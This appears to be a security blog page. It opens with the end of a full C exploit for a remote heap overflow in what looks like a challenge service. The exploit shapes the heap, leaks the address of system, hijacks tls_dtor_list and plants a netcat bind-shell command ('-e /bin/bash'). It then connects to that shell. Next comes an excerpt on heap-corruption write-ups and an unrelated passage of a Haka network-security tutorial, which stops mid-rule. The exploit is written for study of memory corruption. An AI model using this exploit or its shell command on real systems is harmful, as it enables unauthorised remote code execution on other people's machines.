<span class="kt">void</span> <span class="nf">agent_show</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_edit</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_delete</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_exit</span><span class="p">();</span>
<span class="kt">void</span> <span class="nf">select_option</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">opt</span><span class="p">);</span>
<span class="k">struct</span> <span class="n">fake_agent</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">reserved_0</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">name</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">id</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">fake_tls_dtor_entry</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">func</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">obj</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">data</span><span class="p">[</span><span class="mi">40</span><span class="p">];</span>
<span class="p">};</span>
<span class="kt">int</span> <span class="n">sock</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">retrieve</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">output</span><span class="p">[</span><span class="mi">1024</span><span class="p">],</span> <span class="n">input</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">struct</span> <span class="n">fake_agent</span> <span class="n">agent</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">fake_tls_dtor_entry</span> <span class="n">pown</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">leak</span><span class="p">,</span> <span class="n">system</span><span class="p">,</span> <span class="n">tls_dtor_list</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">sock2</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[1] connecting to target ...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">setsock</span><span class="p">(</span><span class="n">HOSTNAME</span><span class="p">,</span> <span class="n">PORT</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] connected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="mi">1024</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[2] shaping heap</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'A'</span><span class="p">,</span> <span class="mh">0xa0</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'B'</span><span class="p">,</span> <span class="mh">0x18</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'C'</span><span class="p">,</span> <span class="mh">0x410</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'D'</span><span class="p">,</span> <span class="mh">0x400</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[3] overflowing next chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'E'</span><span class="p">,</span> <span class="mh">0x18</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'F'</span><span class="p">,</span> <span class="mh">0x200</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'G'</span><span class="p">,</span> <span class="mh">0xe0</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'H'</span><span class="p">,</span> <span class="mh">0x18</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">7</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">5</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="sc">'\xff'</span><span class="p">,</span> <span class="mh">0x210</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">agent_show</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">output</span><span class="p">));</span>
<span class="n">leak</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)(</span><span class="n">output</span> <span class="o">+</span> <span class="mi">240</span><span class="p">));</span>
<span class="n">system</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">-</span> <span class="n">SYS_OFFSET</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] system function mapped at 0x%"</span><span class="n">PRIx64</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">system</span><span class="p">);</span>
<span class="n">tls_dtor_list</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">+</span> <span class="n">TLS_OFFSET</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] tls_dtor_list pointer at 0x%"</span><span class="n">PRIx64</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">tls_dtor_list</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[4] overlapping next chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="mh">0xff</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">reserved_0</span> <span class="o">=</span> <span class="mh">0xdeadbeef</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">tls_dtor_list</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="mi">6</span><span class="p">;</span>
<span class="n">memset</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="sc">'X'</span><span class="p">,</span> <span class="mh">0x210</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">input</span> <span class="o">+</span> <span class="mh">0x210</span><span class="p">,</span> <span class="o">&</span><span class="n">agent</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">fake_agent</span><span class="p">));</span>
<span class="n">agent_edit</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="mh">0x210</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">fake_agent</span><span class="p">));</span>
<span class="n">pown</span><span class="p">.</span><span class="n">ret</span> <span class="o">=</span> <span class="n">tls_dtor_list</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">;</span>
<span class="n">pown</span><span class="p">.</span><span class="n">func</span> <span class="o">=</span> <span class="n">system</span><span class="p">;</span>
<span class="n">pown</span><span class="p">.</span><span class="n">obj</span> <span class="o">=</span> <span class="n">tls_dtor_list</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">;</span>
<span class="n">strcpy</span><span class="p">(</span><span class="n">pown</span><span class="p">.</span><span class="n">data</span><span class="p">,</span> <span class="s">"nc.traditional -lp 9999 -e /bin/bash"</span><span class="p">);</span>
<span class="n">agent_edit</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">pown</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">fake_tls_dtor_entry</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[5] powning</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">retrieve</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">agent_exit</span><span class="p">();</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
<span class="n">close</span><span class="p">(</span><span class="n">sock</span><span class="p">);</span>
<span class="n">sock2</span> <span class="o">=</span> <span class="n">setsock</span><span class="p">(</span><span class="n">HOSTNAME</span><span class="p">,</span> <span class="mi">9999</span><span class="p">);</span>
<span class="n">session</span><span class="p">(</span><span class="n">sock2</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_exit</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_create</span><span class="p">(</span><span class="kt">char</span> <span class="n">c</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="n">len</span><span class="p">];</span>
<span class="n">memset</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"1"</span><span class="p">);</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_select</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">ag</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="n">snprintf</span><span class="p">(</span><span class="n">ag</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s">"%d"</span><span class="p">,</span> <span class="n">agent</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"2"</span><span class="p">);</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">ag</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_show</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">agent_select</span><span class="p">(</span><span class="n">agent</span><span class="p">);</span>
<span class="n">write</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="s">"3</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_edit</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">agent_select</span><span class="p">(</span><span class="n">agent</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"4"</span><span class="p">);</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_delete</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">agent_select</span><span class="p">(</span><span class="n">agent</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"5"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">select_option</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">opt</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">opt</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">send_data</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">output</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">write</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">retrieve</span><span class="p">)</span> <span class="p">{</span>
<span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">output</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">setsock</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">hostname</span><span class="p">,</span> <span class="kt">int</span> <span class="n">port</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">s</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">hostent</span> <span class="o">*</span><span class="n">hent</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sa</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">in_addr</span> <span class="n">ia</span><span class="p">;</span>
<span class="n">hent</span> <span class="o">=</span> <span class="n">gethostbyname</span><span class="p">(</span><span class="n">hostname</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hent</span><span class="p">)</span> <span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span><span class="p">,</span> <span class="n">hent</span><span class="o">-></span><span class="n">h_addr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span><span class="p">((</span><span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span> <span class="o">==</span> <span class="n">INADDR_ANY</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"incorrect address !!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">((</span><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"socket failed !!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sa</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sa</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection failed !!!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">s</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">session</span><span class="p">(</span><span class="kt">int</span> <span class="n">sock</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">fd_set</span> <span class="n">fds</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[!] enjoy your shell </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">COLOR_SHELL</span><span class="p">,</span> <span class="n">stderr</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">FD_ZERO</span><span class="p">(</span><span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">select</span><span class="p">(</span><span class="n">sock</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">buf</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">write</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">buf</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">COLOR_SHELL</span><span class="p">,</span> <span class="n">stderr</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p><img src="/images/woot.png" alt="" class="center" /></p>In this post, we want to share some notes on how to exploit heap-based overflow vulnerabilities by corrupting the size of memory chunks. Please note that we do not present here original content but only want to share with the community two detailed write-up. The first one exploits a basic heap-based overflow by enlarging the size of memory chunks. The second one shrinks their sizes in order to turn a NULL byte off-by-one error – present in a hardened binary (all memory corruption mitigations are enabled) – into remote code execution.Hackers do the Haka2015-11-23T08:52:43+00:002015-11-23T08:52:43+00:00/networking,/intrusion/detection,/lua/2015/11/23/hackers-do-the-haka<p><a href="haka-security.org">Haka</a> is an open source network security oriented language
that allows writing security rules and protocol dissectors. In this first part
of a two-part series, we will focus on writing security rules.</p>
<h2 id="what-is-haka">What is Haka</h2>
<p>Haka is an open source security oriented language that allows specifying and
applying security policies on live captured traffic. Haka is based on Lua. It
is a simple, lightweight (~200 kB) and fast (a JiT compiler is available)
scripting language.</p>
<p>The scope of Haka is twofold. First of all, it enables the specification of
security rules to filter unwanted streams and report malicious activities. Haka
provides a simple API for advanced packet and stream manipulation. One can drop
packets or create new ones and inject them. Haka also supports on-the-fly
packet modification. This is one of the main features of Haka since all complex
tasks such as resizing packets, setting correctly sequence numbers are done
transparently to the user. This is done live without the need of a proxy.</p>
<p>Secondly, Haka is endowed with a grammar allowing the specification of
protocols and their underlying state machine. Haka supports both type of
protocols : binary-based protocols (e.g. dns) and text-based protocols (e.g.
http). The specification covers packet-based protocols such as ip as well as
stream-based protocols like http.</p>
<p>Haka is embedded into a modular framework. It includes several packet capture
modules (pcap, nfqueue) that enable end users to apply their security policy on
live captured traffic or to replay it on a packet trace file. The framework
provides also logging (syslog) and alerting modules (syslog, elasticsearch).
Alerts follow an IDMEF-like format. Finally, the framework has auxiliary
modules such as a pattern matching engine and an instruction disassembler
module. These modules allow writing fine-grained security rules to detect
obfuscated malware for instance. Haka was designed in a modular fashion
enabling users to extend it with additional modules.</p>
<p><img src="/images/haka_arch.png" alt="" width="460px" /></p>
<h2 id="haka-tool-suite">Haka tool suite</h2>
<p>Haka provides a collection of four tools:</p>
<ul>
<li><strong>haka</strong>. It is the main program of the collection. It is intended to be used as a daemon to monitor packets in the background. Packets are dissected and filtered according to the specified security policy file. Haka takes as input a configuration file. For example, the following configuration sample file instructs Haka to capture packets from the interface eth0 using nfqueue module and to filter them using the policy file myrules.lua. This script file loads typically user-defined or built-in protocol dissectors and defines a set of security rules. Additionally, users can select the alerting and reporting module to be used and set some specific module options:</li>
</ul>
<figure class="highlight"><pre><code class="language-ini" data-lang="ini"><span class="c"># Select the haka configuration file to use
</span><span class="py">configuration</span> <span class="p">=</span> <span class="s">"myrules.lua"</span>
<span class="c"># Optionally select the number of thread to use
# By default, all system thread will be used
#thread = 4
</span>
<span class="nn">[packet]</span>
<span class="c"># Select the capture model, nfqueue or pcap
</span><span class="py">module</span> <span class="p">=</span> <span class="s">"packet/nfqueue"</span>
<span class="c"># Select the interfaces to listen to
#interfaces = "any"
</span><span class="py">interfaces</span> <span class="p">=</span> <span class="s">"eth0"</span>
<span class="c"># Select packet dumping for nfqueue
#dump = yes
#dump_input = "/tmp/input.pcap"
#dump_output = "/tmp/output.pcap"
</span>
<span class="nn">[log]</span>
<span class="c"># Select the log module
</span><span class="py">module</span> <span class="p">=</span> <span class="s">"log/syslog"</span>
<span class="c"># Set the default logging level
#level = "info,packet=debug"
</span>
<span class="nn">[alert]</span>
<span class="c"># Select the alert module
</span><span class="py">module</span> <span class="p">=</span> <span class="s">"alert/syslog"</span>
<span class="c">#module = "alert/file"
#module = "alert/elasticsearch"
</span>
<span class="c"># Disable alert on standard output
</span><span class="err">#</span><span class="py">alert_on_stdout</span> <span class="p">=</span> <span class="s">no</span></code></pre></figure>
<ul>
<li>
<p><strong>hakactl</strong>. This tool allows controling a running Haka daemon. One can get live statistics on captured packets, inspect logs or simply shutdown/restart the daemon.</p>
</li>
<li>
<p><strong>hakapcap</strong>. This tool allows replaying a policy file offline on a packet capture trace using the pcap module. For instance, this is useful to perform network forensics.</p>
</li>
<li>
<p><strong>hakabana</strong>. This tool allows visualizing and monitoring network traffic in real time using Kibana and Elasticsearch. Hakabana consists in a set of custom security rules that pushes information about the traffic that passes though Haka on an elastisserach server and made them available through a Kibana dashboard. An additional dashboard is also available to visualize Haka alerts.</p>
</li>
</ul>
<p><a href="/images/kibana_ips.png"><img src="/images/kibana_ips.png" alt="kibana_ips" width="290px" /></a>
<a href="/images/hakabana_dashboard.png"><img src="/images/hakabana_dashboard.png" alt="hakabana" width="290px" /></a></p>
<h2 id="writing-security-rules">Writing security rules</h2>
<p>Haka provides a simple way to write security rules in order to filter, modify,
create and inject packets and streams. When a flow is detected as malicious,
users can report an alert or drop the flow. Users can define even more complex
scenarios to mitigate the impact of an attack. For instance, one can alter http
requests to force obsolete browsers to update or forge specific packets to fool
scanning port tools.</p>
<h3 id="packet-filtering">Packet Filtering</h3>
<p>The following rule is a basic packet filtering rule that blocks all connections
from a given network address.</p>
<figure class="highlight"><pre><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">ipv4</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/ipv4"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">tcp</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/tcp_connection"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">net</span> <span class="o">=</span> <span class="n">ipv4</span><span class="p">.</span><span class="n">network</span><span class="p">(</span><span class="s2">"192.168.101.0/24"</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">new_connection</span><span class="p">,</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span> <span class="p">(</span><span class="n">flow</span><span class="p">,</span> <span class="n">pkt</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">log</span><span class="p">(</span><span class="s2">"tcp connection %s:%i -> %s:%i"</span><span class="p">,</span>
<span class="n">flow</span><span class="p">.</span><span class="n">srcip</span><span class="p">,</span> <span class="n">flow</span><span class="p">.</span><span class="n">srcport</span><span class="p">,</span>
<span class="n">flow</span><span class="p">.</span><span class="n">dstip</span><span class="p">,</span> <span class="n">flow</span><span class="p">.</span><span class="n">dstport</span><span class="p">)</span>
<span class="k">if</span> <span class="n">net</span><span class="p">:</span><span class="n">contains</span><span class="p">(</span><span class="n">flow</span><span class="p">.</span><span class="n">dstip</span><span class="p">)</span> <span class="k">then</span>
<span class="n">haka</span><span class="p">.</span><span class="n">alert</span><span class="p">{</span>
<span class="n">severity</span> <span class="o">=</span> <span class="s2">"low"</span><span class="p">,</span>
